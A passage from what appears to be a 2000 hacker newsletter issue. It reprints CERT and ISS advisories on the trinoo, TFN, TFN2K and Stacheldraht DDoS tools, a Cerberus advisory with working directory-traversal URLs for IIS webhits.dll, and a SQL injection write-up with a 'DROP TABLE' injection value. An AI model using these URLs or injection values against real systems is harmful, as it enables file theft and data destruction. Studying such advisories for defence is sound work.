interface the radio with computer equipment and also manipulate outside
phone lines using ham radios, a recurring problem in these parts were pirate
operators making bogus 911 calls using the local CN-Tower's (then public or
'open' autopatch - it now requires a code and subaudible PL tone) actually
closed down the repeater site for some time and caused unknown harassing
traffic to the 911 operators fielding the bogus calls.
The pirate is not totally safe however. much like Kevin was apprehended by
Tsutomu thru lax use of his cellphone and some radio direction finding gear
(RDF) so can the 2m pirate be tracked through RDF triangulation, several
grass roots groups do nothing but track down pirate signals or sometimes for
competition, random placed signals, in what is known as the 'Fox Hunt'. But
this requires lots of manpower and the willingness to get out there and help
do some tracking.
Epilogue
I truly hope Kevin is allowed to get back into one of his lifetime loves but
he may find that there are too many caveats with new features and computer
integration into the repeater systems, mailboxes and the like are common place
on repeaters, and so are email gateways, so it is conceivable that one could
inadvertantly get into trouble through the grey lines of technology....
Meanwhile, all the best to Kevin and his family, and hopefully you learned a
little bit about amateur radio's offerings along the way, peace out.
Cruciphux
cruciphux@dok.org
Editor HWA.hax0r.news newsletter.
http://welcome.to/HWA.hax0r.news/
Further reading:
http://www.arrl.org - The main site of the American Radio Relay League
http://www.qrz.com/ - If you know the callsign of the operator his docs are
published publically in a database which can be searched
online here. Also contains other info and links.
http://www.freekevin.com/ - You know, like more info than you need on KDM.
@HWA
08.0 Distrubuted Attacks on the rise. TFN and Trinoo.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
CMP Techweb : http://www.techweb.com/wire/story/TWB19991130S0010
Intruders Get Under A Network's
Skin
(11/30/99, 5:40 p.m. ET) By Rutrell Yasin, InternetWeek
A rise in rogue distributed denial of service
tools being installed on networks by intruders
has prompted the Computer Emergency
Response Team (CERT) Coordination Center
to help companies thwart the large coordinated
packet flooding attacks.
CERT, a watchguard organization, has issued an
advisory on two tools--trinoo and Tribe Flood Network
(TFN)--after receiving reports from organizations
affected by the tools.
The tools "appear to be undergoing active development,
testing, and deployment on the Internet," according to a
CERT incident note.
So far, the tools have been installed on thousands of
servers or workstations in about 100 enterprise sites, said
Kevin Houle, CERT's incident response team leader.
While the type of packet flooding attacks the tools
generate are not new, the scope of the attacks can have
a devastating impact on an enterprise network, industry
experts and IT managers agreed.
Both trinoo and TFN enable an intruder to launch
coordinated attacks from many sources against one or
more targets. In essence, the tools use bandwidth from
multiple systems on diverse networks to generate potent
attacks.
The tools "can generate very large denial of service
attacks that consume as much as one gigabyte of data
per second," said Houle. To put that in perspective:
Rather than using one BB gun to hit a target, a hacker
now has the equivalent of 1,000 BB guns, Houle said.
Or the effects can be more like a shotgun, said Mike
Hagger, vice president of security at Oppenheimer
Funds. These tools can "be deadly and can bring a
company to its knees in a matter of seconds," Hagger
said.
These rogue distributed tools are usually installed on host
servers that have been compromised by exploiting known
security holes, such as various Remote Procedural Call
vulnerabilities, according to CERT.
Trinoo is used to launch coordinated UDP flood attacks
from many sources. A trinoo network consists of a small
number of servers and a large number of clients. To
initiate an attack, an intruder connects to a trinoo server
and instructs it to launch an attack against one or more
IP addresses. The trinoo server then communicates with
the clients, giving them instructions to attack one or more
IP addresses for a specified period of time, CERT said.
In addition to UDP flood attacks, TFN can generate
TCP SYN flood, ICMPecho request flood, and ICMP
directed broadcasts or smurf attacks. The tool can
generate packets with spoofed source IP addresses. To
launch an attack with TFN, an intruder instructs a client
or server program to send attack instructions to a list of
TFN servers or clients.
In its alert, CERT has issued a number of steps IT
managers can take to thwart distributed denial of service
attacks. To prevent installation of distributed attack tools
on networked systems, users should stay up to date with
security patches to operating systems and applications
software.
IT managers should also continuously monitor their
networks for signature of distributed attack tools. For
example, if a company uses intrusion detection systems,
IT should tune it to recognize signs of trinoo or TFN
activity.
Since a site under attack may be unable to communicate
via the Internet during an attack, security policies should
include "out of the band communications with upstream
network operators or emergency response teams,"
CERT advised.
@HWA
CERT Advisory:
http://www.cert.org/incident_notes/IN-99-07.html
CERT� Incident Note IN-99-07
The CERT Coordination Center publishes incident notes to provide
information about incidents to the Internet community.
Distributed Denial of Service Tools
Updated: December 8, 1999 (added DSIT Workshop paper and IN-99-05)
Thursday, November 18, 1999
Overview
We have received reports of intruders installing distributed denial of
service tools. Tools we have encountered utilize distributed technology
to create large networks of hosts capable of launching large coordinated
packet flooding denial of service attacks.
We have seen distributed tools installed on hosts that have been
compromised due to exploitation of known vulnerabilities. In particular,
we have seen vulnerabilities in various RPC services exploited. For more
information see the following CERT Incident Notes:
IN-99-04, Similar Attacks Using Various RPC Services
IN-99-05, Systems Compromised Through a Vulnerability in am-utils
Two of the tools we have seen are known as trinoo (or trin00) and tribe
flood network (or TFN). These tools appear to be undergoing active
development, testing, and deployment on the Internet.
Descriptions
Trinoo
Tribe Flood Network
Trinoo
Trinoo is a distributed tool used to launch coordinated UDP flood denial
of service attacks from many sources. For more information about various
UDP flood attacks, please see CERT Advisory CA-96.01. A trinoo network
consists of a small number of servers, or masters, and a large number of
clients, or daemons.
A denial of service attack utilizing a trinoo network is carried out by
an intruder connecting to a trinoo master and instructing that master to
launch a denial of service attack against one or more IP addresses. The
trinoo master then communicates with the daemons giving instructions to
attack one or more IP addresses for a specified period of time.
1.intruder -------> master; destination port 27665/tcp
2.master -------> daemons; destination port 27444/udp
3.daemons -------> UDP flood to target with randomized destination ports
The binary for the trinoo daemon contains IP addresses for one or more
trinoo master. When the trinoo daemon is executed, the daemon announces
it's availability by sending a UDP packet containing the string "*HELLO*"
to it's programmed trinoo master IP addresses.
daemon -------> masters; destination port 31335/udp
The trinoo master stores a list of known daemons in an encrypted file
named "..." in the same directory as the master binary. The trinoo master
can be instructed to send a broadcast request to all known daemons to
confirm availability.
Daemons receiving the broadcast respond to the master with a UDP packet
containing the string "PONG".
1.intruder -------> master; destination port 27665/tcp
2.master -------> daemons; destination port 27444/udp
3.daemons -------> master; destination port 31335/udp
All communications to the master on port 27665/tcp require a password,
which is stored in the daemon binary in encrypted form. All communications
with the daemon on port 27444/udp require the UDP packet to contain the
string "l44" (that's a lowercase L, not a one).
The source IP addresses of the packets in a trinoo-generated UDP flood
attack are not spoofed in versions of the tool we have seen. Future
versions of the tool could implement IP source address spoofing.
Regardless, a trinoo-generated denial of service attack will most likely
appear to come from a large number of different source addresses.
We have seen trinoo daemons installed under a variety of different names,
but most commonly as
ns
http
rpc.trinoo
rpc.listen
trinix
rpc.irix
irix
Running strings against the daemon and master binaries produces output
similar to this (we have replaced master IP address references in the
daemon binary with X.X.X.X)
trinoo daemon
trinoo master
socket ---v
bind v1.07d2+f3+c
recvfrom trinoo %s
%s %s %s l44adsl
aIf3YWfOhw.V. sock
PONG 0nm1VNMXqRMyM
*HELLO* 15:08:41
X.X.X.X Aug 16 1999
X.X.X.X trinoo %s [%s:%s]
X.X.X.X bind
read
*HELLO*
... rest omitted ...
Tribe Flood Network
TFN, much like Trinoo, is a distributed tool used to launch coordinated
denial of service attacks from many sources against one or more targets.
In additional to being able to generate UDP flood attacks, a TFN network
can also generate TCP SYN flood, ICMP echo request flood, and ICMP
directed broadcast (e.g., smurf) denial of service attacks. TFN has
the capability to generate packets with spoofed source IP addresses.
Please see the following CERT Advisories for more information about
these types of denial of service attacks.
CA-96.01, TCP SYN Flooding and IP Spoofing Attacks
CA-98.01, "smurf" IP Denial of Service Attacks
A denial of service attack utilizing a TFN network is carried out by an
intruder instructing a client, or master, program to send attack
instructions to a list of TFN servers, or daemons. The daemons then
generate the specified type of denial of service attack against one
or more target IP addresses. Source IP addresses and source ports can
be randomized, and packet sizes can be altered.
A TFN master is executed from the command line to send commands to TFN
daemons. The master communicates with the daemons using ICMP echo reply
packets with 16 bit binary values embedded in the ID field, and any
arguments embedded in the data portion of packet. The binary values,
which are definable at compile time, represent the various instructions
sent between TFN masters and daemons.
Use of the TFN master requires an intruder-supplied list of IP addresses
for the daemons. Some reports indicate recent versions of TFN master may
use blowfish encryption to conceal the list of daemon IP addresses.
Reports also indicate that TFN may have remote file copy (e.g., rcp)
functionality, perhaps for use for automated deployment of new TFN
daemons and/or software version updating in existing TFN networks.
We have seen TFN daemons installed on systems using the filename td.
Running strings on the TFN daemon binary produces output similar to this.
%d.%d.%d.%d
ICMP
Error sending syn packet.
tc: unknown host
3.3.3.3
mservers
randomsucks
skillz
rm -rf %s
ttymon
rcp %s@%s:sol.bin %s
nohup ./%s
X.X.X.X
X.X.X.X
lpsched
sicken
in.telne
Solutions
Distributed attack tools leverage bandwidth from multiple systems on
diverse networks to produce very potent denial of service attacks. To
a victim, an attack may appear to come from many different source
addresses, whether or not IP source address spoofing is employed by
the attacker. Responding to a distributed attack requires a high degree
of communication between Internet sites. Prevention is not straight
forward because of the interdependency of site security on the Internet;
the tools are typically installed on compromised systems that are outside
of the administrative control of eventual denial of service attack targets.
There are some basic suggestions we can make regarding distributed denial
of service attacks:
Prevent installation of distributed attack tools on your systems
Remain current with security-related patches to operating systems and
applications software. Follow security best-practices when administrating
networks and systems.
Prevent origination of IP packets with spoofed source addresses
For a discussion of network ingress filtering, refer to RFC 2267, Network
Ingress Filtering: Defeating Denial of Service Attacks which employ IP
Source Address Spoofing
Monitor your network for signatures of distributed attack tools
Sites using intrusion detection systems (e.g., IDS) may wish to establish
patterns to look for that might indicate trinoo or TFN activity based on
the communications between master and daemon portions of the tools. Sites
who use pro-active network scanning may wish to include tests for installed
daemons and/or masters when scanning systems on your network.
if you find a distributed attack tool on your systems
It is important to determine the role of the tools installed on your system.
The piece you find may provide information that is useful in locating and
disabling other parts of distributed attack networks. We encourage you to
identify and contact other sites involved.
If you are involved in a denial of service attack
Due to the potential magnitude of denial of service attacks generated by
distributed networks of tools, the target of an attack may be unable to
rely on Internet connectivity for communications during an attack. Be
sure your security policy includes emergency out-of-band communications
procedures with upstream network operators or emergency response teams
in the event of a debilitating attack.
In November 1999, experts addressed issues surrounding distributed-systems
intruder tools. The DSIT Workshop produced a paper where workshop
participants examine the use of distributed-system intruder tools and provide
information about protecting systems from attack by the tools, detecting the
use of the tools, and responding to attacks.
Results of the Distributed-Systems Intruder Tools Workshop
Acknowledgments
The CERT/CC would like to acknowledge and thank our constituency and our
peers for important contributions to the information used in this Incident
Note.
This document is available from:
http://www.cert.org/incident_notes/IN-99-07.html
Articles of interest:
Characterizing and Tracing Packet Floods Using Cisco Routers
http://www.cisco.com/warp/public/707/22.html
Improving Security on Cisco Routers
http://www.cisco.com/warp/public/707/21.html
Internet Security Advisories:
http://www.cisco.com/warp/public/707/advisory.html
Additional info, ISS advisory on Trinoo/Tribe variants:
-----BEGIN PGP SIGNED MESSAGE-----
ISS Security Alert
February 9, 2000
Denial of Service Attack using the TFN2K and Stacheldraht programs
Synopsis:
A new form of Distributed Denial of Service (DDoS) attack has been
discovered following the release of the trin00 and Tribe Flood Network (TFN)
denial of service programs (see December 7, 1999 ISS Security Alert at
http://xforce.iss.net/alerts/advise40.php3). These attacks are more powerful
than any previous denial of service attack observed on the Internet. A
Distributed Denial of Service attack is designed to bring a network down by
flooding target machines with large amounts of traffic. This traffic can
originate from many compromised machines, and can be managed remotely using
a client program. ISS X-Force considers this attack a high risk since it can
potentially impact a large number of organizations. DDoS attacks have proven
to be successful and are difficult to defend against.
Description:
Over the last two months, several high-capacity commercial and educational
networks have been affected by DDoS attacks. In addition to the trin00 and
TFN attacks, two additional tools are currently being used to implement this
attack: TFN2K and Stacheldraht. Both of these tools are based on the
original TFN/trin00 attacks described in the December ISS Security Alert.
Attackers can install one of these DDoS programs (trin00, TFN, TFN2K, or
Stacheldraht) on hundreds of compromised machines and direct this network of
machines to initiate an attack against single or multiple victims. This
attack occurs simultaneously from these machines, making it more dangerous
than any DoS attack launched from a single machine.
Technical Information:
TFN2K:
The TFN2K distributed denial of service system consists of a client/server
architecture.
The Client:
The client is used to connect to master servers, which can then perform
specified attacks against one or more victim machines. Commands are sent
from the client to the master server within the data fields of ICMP, UDP,
and TCP packets. The data fields are encrypted using the CAST algorithm and
base64 encoded. The client can specify the use of random TCP/UDP port
numbers and source IP addresses. The system can also send out "decoy"
packets to non-target machines. These factors make TFN2K more difficult to
detect than the original TFN program.
The Master Server:
The master server parses all UDP, TCP, and ICMP echo reply packets for
encrypted commands. The master server does not use a default password when
it is selected by the user at compile time.
The Attack:
The TFN2K client can be used to send various commands to the master for
execution, including commands to flood a target machine or set of target
machines within a specified address range. The client can send commands
using UDP, SYN, ICMP echo, and ICMP broadcast packets. These flood attacks
cause the target machine to slow down because of the processing required to
handle the incoming packets, leaving little or no network bandwidth.
Possible methods for detection of these flooding attacks are recommended in
the TFN/trin00 December 7, 1999 ISS Security Alert. TFN2K can also be used
to execute remote commands on the master server and bind shells to a
specified TCP port.
TFN2K runs on Linux, Solaris, and Windows platforms.
Stacheldraht (Barbed Wire):
Stacheldraht consists of three parts: the master server, client, and agent
programs.
The Client:
The client is used to connect to the master server on port 16660 or port
60001. Packet contents are blowfish encrypted using the default password
"sicken", which can be changed by editing the Stacheldraht source code.
After entering the password, an attacker can use the client to manage
Stacheldraht agents, IP addresses of attack victims, lists of master
servers, and to perform DoS attacks against specified machines.
The Master Server:
The master server handles all communication between client and agent
programs. It listens for connections from the client on port 16660 or 60001.
When a client connects to the master, the master waits for the password
before returning information about agent programs to the client and
processing commands from the client.
The Agent:
The agent listens for commands from master servers on port 65000. In
addition to this port, master server/agent communications are also managed
using ICMP echo reply packets. These packets are transmitted and replied to
periodically. They contain specific values in the ID field (such as 666,
667, 668, and 669) and corresponding plaintext strings in the data fields
(including "skillz", "ficken", and "spoofworks"). The ICMP packets act as a
"heartbeat" between agent and master server, and to determine source IP
spoofing capabilities of the master server. The agent identifies master
servers using an internal address list, and an external encrypted file
containing master server IP addresses. Agents can be directed to "upgrade"
themselves by downloading a fresh copy of the agent program and deleting the
old image as well as accepting commands to execute flood attacks against
target machines.
The Attack:
Like TFN/TFN2K, Stacheldraht can be used to perform ICMP, SYN, and UDP flood
attacks. The attacks can run for a specified duration, and SYN floods can be
directed to a set of specified ports. These flood attacks cause the target
machine to slow down because of the processing required to handle the
incoming packets, leaving little or no network bandwidth. Possible methods
for detection of these flooding attacks are discussed in the TFN/trin00 ISS
Security Alert published December 7, 1999.
Stacheldraht runs on Linux and Solaris machines.
Detecting TFN2K/Stacheldraht related attacks:
ISS SAFEsuite intrusion detection solution, RealSecure, detects the Denial
of Service attacks that these distributed tools use, providing early warning
and response capabilities. RealSecure can reconfigure firewalls and routers
to block the traffic. On some firewalls this can be as granular as blocking
a particular service or protocol port. In conjunction with the December 7,
1999 ISS Security Alert, RealSecure 3.2.1 included signatures to detect the
communications between the distributed components of TFN and trin00.
RealSecure will add signatures to detect TFN2K and Stacheldraht in its next
release, which will also include an X-press Update capability to speed
future signature deployment.
Additional Information:
ISS worked in coordination with CERT, SANS, and the NIPC. The following is
additional information regarding these DDoS attacks:
- - Advisory CA-2000-01 Denial-of-Service Developments
http://www.cert.org/advisories/CA-2000-01.html
- - SANS Network Security Digest Vol. 4 No. 1 - January 17, 2000
- - http://www.fbi.gov/nipc/trinoo.htm
- - http://staff.washington.edu/dittrich/misc/stacheldraht.analysis
About ISS
ISS is a leading global provider of security management solutions for
e-business. By offering best-of-breed SAFEsuite(tm) security software,
comprehensive ePatrol(tm) monitoring services, and industry-leading
expertise, ISS serves as its customers' trusted security provider protecting
digital assets and ensuring the availability, confidentiality and integrity
of computer systems and information critical to e-business success. ISS'
security management solutions protect more than 5,000 customers including 21
of the 25 largest U.S. commercial banks, 9 of the 10 largest
telecommunications companies and over 35 government agencies. Founded in
1994, ISS is headquartered in Atlanta, GA, with additional offices
throughout North America and international operations in Asia, Australia,
Europe and Latin America. For more information, visit the ISS Web site at
www.iss.net or call 888-901-7477.
Copyright (c) 2000 by Internet Security Systems, Inc.
Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express consent of
the X-Force. If you wish to reprint the whole or any part of this Alert in
any other medium excluding electronic medium, please e-mail xforce@iss.net
for permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
X-Force PGP Key available at: http://xforce.iss.net/sensitive.php3 as well
as on MIT's PGP key server and PGP.com's key server.
Please send suggestions, updates, and comments to: X-Force xforce@iss.net of
Internet Security Systems, Inc.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv
iQCVAwUBOKHygjRfJiV99eG9AQGLhQP+L2H4KNHtP2Tl9YT3P5OIkbSrIszC8lW/
iDM8+6wkz0POcjNDXNHNDpVb203Yv+tjdBu/q6cP7QYVeZ9PUElUfXcN6a4bJTpH
OOaARlvyPRFiArxvFgdIbypsFhTWxc4blJOMb8rbBZgzEa7pZiBzZQibN54l3E1A
vg77CCVq3W8=
=sMAK
-----END PGP SIGNATURE-----
@HWA
09.0 Teen charged with hacking
~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.mercurycenter.com/svtech/news/indepth/docs/hacker012700.htm
Student charged with hacking
Fugitive: Prosecutors say he broke into Palo Alto firm, then fled to
Bulgaria.
BY HOWARD MINTZ Mercury News Staff Writer
A federal grand jury in San Jose on Wednesday indicted a former Princeton
University student suspected of hacking into the computer system of a Palo
Alto e-commerce company and stealing nearly 2,000 credit card numbers.
In the government's latest attempt to hunt down a computer hacker, federal
prosecutors brought charges against Peter Iliev Pentchev, a 22-year-old
native of Bulgaria who is believed to have fled the United States after
school officials confronted him about his computer activities.
According to the U.S. Attorney's office in San Jose, Pentchev left the
country in late 1998, shortly after the alleged hacking incident occurred.
Law enforcement officials believe Pentchev went to Bulgaria and were
unclear Wednesday what diplomatic obstacles there may be to returning him
to this country to face charges.
The four-count indictment charges Pentchev with violating federal computer
laws by hacking into an undisclosed Palo Alto company between Nov. 20 and
Dec. 19, 1998, stealing at least 1,800 credit card numbers, as well as
user names and passwords of that company's customers. The indictment does
not specify the company, and federal officials declined to name it.
But Assistant U.S. Attorney Mavis Lee, who is prosecuting the case, said
the hacking incident shut down one of the company's Web servers for five
days and caused enough chaos in its database that it cost the firm more
than $100,000 to restore its security system.
Authorities have no evidence that Pentchev used the credit card numbers to
commit fraud.
Federal law-enforcement officials do not believe there is a link between
Pentchev and a computer intruder who earlier this month attempted to
extort $100,000 from Internet music retailer CD Universe, claiming to have
stolen as many as 300,000 credit card numbers. The alleged extortionist
was suspected of operating somewhere in Eastern Europe.
That hacker began posting more than 25,000 allegedly stolen card numbers
on a web site Christmas Day. The site eventually was shut down, and
thousands of customers who had shopped at CD Universe canceled their
cards.
In the Bay Area case, investigators said they were able to trace the
computer intrusion to Pentchev because he left evidence in log files in
the company's computer system. ``He wasn't careful about mopping up after
himself,'' Lee said.
Princeton University officials confronted Pentchev about the allegations
in December 1998, and he disappeared shortly thereafter. If convicted,
Pentchev faces a maximum penalty of 17 years in prison.
Contact Howard Mintz at hmintz@sjmercury.com or (408) 286-0236.
@HWA
10.0 Major security flaw found on Microsoft product
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exclusive: Major security flaw hits Microsoft
http://www.zdnet.co.uk/news/2000/3/ns-12942.html
Thu, 27 Jan 2000 17:03:47 GMT
Will Knight
More embarrassment for Microsoft security as yet another
flaw is discovered. Will Knight brings you this exclusive
report
A British security expert claims to have uncovered a major
security flaw in Microsoft's Web server software, Internet
Information Server 4 (IIS).
David Litchfield a Windows NT specialist with British firm
Cerberus Information Security, says the latest exploit against a
Microsoft product allows a malicious hacker to gain unauthorised
access to sensitive files, including cached or stored credit card
details, address information, user IDs and passwords. Of most
concern is the way these details can be seized: typing a simple
URL into any browser makes it possible to gain access to files on
Web servers running IIS, that have not been specifically
configured to disable the exploit.
According to Litchfield, the situation is serious. "It takes no
expertise [to use this technique] at all. It's so easy to exploit, I dare
not give out a specific example. It would just fall into the hands of
script kiddies [a copycat who uses someone else's techniques to
hack a system]." ZDNet UK News has a copy of the exploit
technique.
Thousands of e-commerce Web sites use IIS prompting Litchfield
to warn a number of high profile UK e-commerce sites he
believed were vulnerable.
Last year Microsoft suffered a major PR blow when its Hotmail
service -- the world's leading Web based email service -- was left
open to attack by a similarly simple hacking technique. But it is not
just Microsoft's products that are vulnerable to attack: there have
been several security breaches of high-profile e-commerce Web
sites illustrating the precarious nature of the fledgling technology.
Visa, for example, recently confirmed receiving ransom demands
from individuals claiming to be able to bring down their computer
system. E-commerce Web site CDUniverse was also struck by a
computer hacker who stole hundreds of credit card numbers and
published them on the Internet.
Mark Tennant, Microsoft product manager for NT Server told
ZDNet UK News, Thursday that although Microsoft products had
made headlines recently for its security flaws, it was to be
expected. "This product is a mainstream product with millions of
users, obviously with that many users flaws are more likely to be
picked up." Ostensibly that might be true, but to observers, those
who see Microsoft products hacked time and again, isn't it a
worrying pattern?
Tennant disagrees and drew comparisons with Linux "which
doesn't have millions of users so you therefore don't hear of this
type of issue". He added: "Microsoft is completely committed to
security." Asked if that commitment could guarantee Windows
2000 -- NT's big brother due next month -- would not suffer the
same sort of security flaws as its predecessor Tennant said: "I
cannot predict what could happen a month down a line... but we
are committed to security."
Litchfield suggests the pressure put on organisations to get online,
by both government and software houses has led to companies
leaving themselves wide open to computer criminals. "The World
Wide Web is a hacker's paradise," he remarks. "The lure of
e-commerce as an effective channel to further promote a business
and fuel its success has led to too many companies getting
'connected' too quickly, sacrificing security for speed."
Security consultant Neil Barrett from another security firm, UK
Information Risk Management, agrees: "The Holy Grail to any
hacker is the remote access exploit. In the past problems with IIS
have mainly been denial of service. If this exploit does what it says
it does, it's down to how well credit card details are protected on
a system which we know from experience is not very well at all."
As a first defence Barrett advises either an intrusion detection
system or encryption or ideally "both".
Full details of the exploit are available from the Cerberus Web site
at this address:http://www.cerberus-infosec.co.uk/adviishtw.html
and a patch for Internet Information Server 4 may be downloaded
from the Microsoft security home page.
What do you think? Tell the Mailroom. And read what
others have said.
@HWA
11.0 Cerberus Information Security Advisory (CISADV000126)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: win2k security list
Date: Jan 26th
Cerberus Information Security Advisory (CISADV000126)
http://www.cerberus-infosec.co.uk/advisories.html
Released : 26th January 2000
Name : Webhits.dll buffer truncation
Affected Systems: Microsoft Windows NT 4 running Internet Information
Server 4 All service Packs
Issue : Attackers can access files outside of the web virtual
directory system and view ASP source
Author : David Litchfield (mnemonix@globalnet.co.uk)
Microsoft Advisory :
http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
Internet Information Server 4.0 ships with an ISAPI application webhits.dll
that provides hit-highlighting functionality for Index Server. Files that
have the extention .htw are dispatched by webhits.dll.
A vulnerability exists in webhits however that allows an attacker to break
out
of the web virtual root file system and gain unathorized access to
other files on the same logical disk drive, such as customer databases,
log files or any file they know or can ascertain the path to. The same
vulnerability can be used to obtain the source of Active Server Pages or
any other server side script file which often contain UserIDs and
passwords as well as other sensitive information.
*** WARNING ****
Even if you have no .htw files on your system you're probably
still vulnerable! A quick test to show if you are vulnerable:
go to http://YOUR_WEB_SERVER_ADDRESS_HERE/nosuchfile.htw
If you receive a message stating the "format of the QUERY_STRING
is invalid" you _are_ vulnerable. Cerberus Information Security's
free vulnerability scanner - CIS - now contains a check for this
issue - available from the website http://www.cerberus-infosec.co.uk/
*** WARNING ****
Details
*******
This vulnerability exploits two problems and for the sake of clarity
this section will be spilt into two.
1) If you DO have .htw files on your system
****************************************
The hit-highlighting functionality provided by Index Server allows
a web user to have a document returned with their original search
terms highlighted on the page. The name of the document is passed
to the .htw file with the CiWebHitsFile argument. webhits.dll,
the ISAPI application that deals with the request, opens the file
highlights accordingly and returns the resulting page. Because
the user has control of the CiWebHitsFile argument passed to the
.htw file they can request pretty much anything they want. A secondary
problem to this is the source of ASP and other scripted pages can
be revealed too.
However, webhits.dll will follow double dots and so an attacker is able
to gain access to files outside of the web virtual root.
For example to view the web access logs for a given day the attacker would
build the following URL
http://charon/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../win
nt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Ful
l
Sample .htw files often installed and left on the system are
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iishelp/iis/misc/iirturnh.htw (this .htw is normally restricted to
loopback)
2) If you DON'T have any .htw files on your system
**************************************************
To invoke the webhits.dll ISAPI application a request needs to be made
to a .htw file but if you don't have any on your web server you might wonder
why you are still vulnerable - requesting a non-existent .htw file will
fail.
The trick is to be able to get inetinfo.exe to invoke webhits.dll but
then also get webhits.dll to access an existing file. We achevie this
by crafting a special URL.
First we need a valid resource. This must be a static file such as a .htm,
.html, .txt or even a .gif or a .jpg. This will be the file opened by
webhits.dll as the template file.
Now we need to get inetinfo.exe to pass it along to webhits for dispatch and
the only way we can do this is by requesting a .htw file.
http://charon/default.htm.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w
3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full
will fail. Obviously. There is no such file on the system with that name.
Notice we've now invoked webhits, however, and by placing a specific number
of spaces (%20s) between the exisiting resource and the .htw it is then
possible to trick the web service: The buffer that holds the name of the
.htw
file to open is truncated, causing the .htw part to be removed and therefore
when it comes to webhits.dll attempting to open the file it succeeds and we
are then returned the contents of the file we want to access without there
actually being a real .htw file on the system.
The code is probably doing something similar to this:
FILE *fd;
int DoesTemplateExist(char *pathtohtwfile)
{
// Just in case inetinfo.exe passes too long a string
// let's make sure it's of a suitable length and not
// going to open a buffer overrun vulnerability
char *file;
file = (char *)malloc(250);
strncpy(file,pathtohtwfile,250);
fd = fopen(file,"r");
// Success
if(fd !=NULL)
{
return 1;
}
// failed
else
{
return 0;
}
}
Here webhits.dll "contains" a function called DoesTemplateExist() and is
passed
a pointer to a 260 byte long string buffer containing the path to the .htw
file
to open but this buffer is further reduced in length by the strncpy()
function
removing whatever was stored in the last ten bytes (in this case the .htw of
the
HTTP REQUEST_URI) so when fopen() is called it succeeds. This happens
because
Windows NT will ignore trailing spaces in a file name.
Solution
********
.htw needs to be unassociated from webhits.dll
To do this open the Internet Server Manager (MMC). In the left hand pane
right click the computer you wish to administer and from the menu that pops
up choose Properties.
From the Master Properties select the WWW Service and then click Edit. The
WWW Service Master properties window should open. From here click on the
Home Directory tab and then click the Configuration button. You should
be presented with an App Mappings tab in the Application Mappings window.
Find the .htw extention and then highlight it then click on remove. If a
confirmation
window pops up selected Yes to remove. Finally click on Apply and select
all of the child nodes this should apply to and then OK that. Now close all
of the WWW Service property windows.
About Cerberus Information Security, Ltd
****************************************
Cerberus Information Security, Ltd, a UK company, are specialists in
penetration testing and other
security auditing services. They are the developers of CIS (Cerberus'
Internet
security scanner) available for free from their website:
http://www.cerberus-infosec.co.uk
To ensure that the Cerberus Security Team remains one of the strongest
security audit teams available globally
they continually research operating system and popular service software
vulnerabilites
leading to the dicovery "world first" issues. This not only keeps the team
sharp
but also helps the industry and vendors as a whole ultimately protecting the
end consumer.
As testimony to their ability and expertise one just has to look at exactly
how many major
vulnerabilities have been discovered by the Cerberus Security Team - over 40
to date,
making them a clear leader of companies offering such security services.
Founded in late 1999, by Mark and David Litchfield, Cerberus Information
Security, Ltd
are located in London, UK but serves customers across the World. For more
information
about Cerberus Information Security, Ltd please visit their website or call
on
+44(0) 181 661 7405
Permission is hereby granted to copy or redistribute this advisory but only
in its entirety.
Copyright (C) 2000 by Cerberus Information Security, Ltd
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
@HWA
12.0 "How I hacked Packetstorm Security" by Rainforest Puppy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-- Advisory RFP2K01 ------------------------------ rfp.labs ------------
"How I hacked PacketStorm"
A look at hacking wwwthreads via SQL
------------------------------- rain forest puppy / rfp@wiretrip.net ---
Table of contents:
-1. Scope of problem
-2. Long explaination of SQL hacking
-3. Solution
-4. Conclusion
-5. Included perl scripts
------------------------------------------------------------------------
----[ 1. Scope of problem
Many applications are vulnerable to various forms of SQL hacking. While
programs know they should avoid strcpy() and giving user data to a
system() call, many are unaware of how SQL queries can be tampered with.
This is more of a technical paper than an advisory, but it does explain
how I used a vulnerability in the wwwthreads package to gain
administrative access and some 800 passwords to PacketStorm's discussion
forum.
----[ 2. Long explaination of SQL hacking
As with any other day, I was surfing around the PacketStorm forums, which
use wwwthreads. The URL parameters (the cruft after the '?' in an URL) of
the forums started catching my eye. Being the web security puppy I am, I
started getting curious. So using an ultra-insightful hacking technique,
I changed the 'Board=general' parameter to read 'Board=rfp' used with the
showpost.pl script. Lo and behold I get the following error given to me:
We cannot complete your request. The reason reported was:
Can't execute query:
SELECT B_Main,B_Last_Post
FROM rfp
WHERE B_Number=1
. Reason: Table 'WWWThreads.rfp' doesn't exist
Seeing there's also a 'Number=1' parameter, we can figure this query can
be reconstructed as
SELECT B_Main,B_Last_Post FROM $Board WHERE B_Number=$Number
Now, if any of you have read my phrack 54 article (the SQL appension part,
available at http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=2) you can
see where I'm going. We can not only substitute a $Board name and
$Number, but also extra SQL commands. Imagine if $Board were to equal
'general; DROP TABLE general; SELECT * FROM general ' This would translate
into
SELECT B_Main,B_Last_Post FROM general; DROP TABLE general;
SELECT * FROM general WHERE B_Number=$Number
Now the ';' is generic for ending a command. Normally we could use a '#'
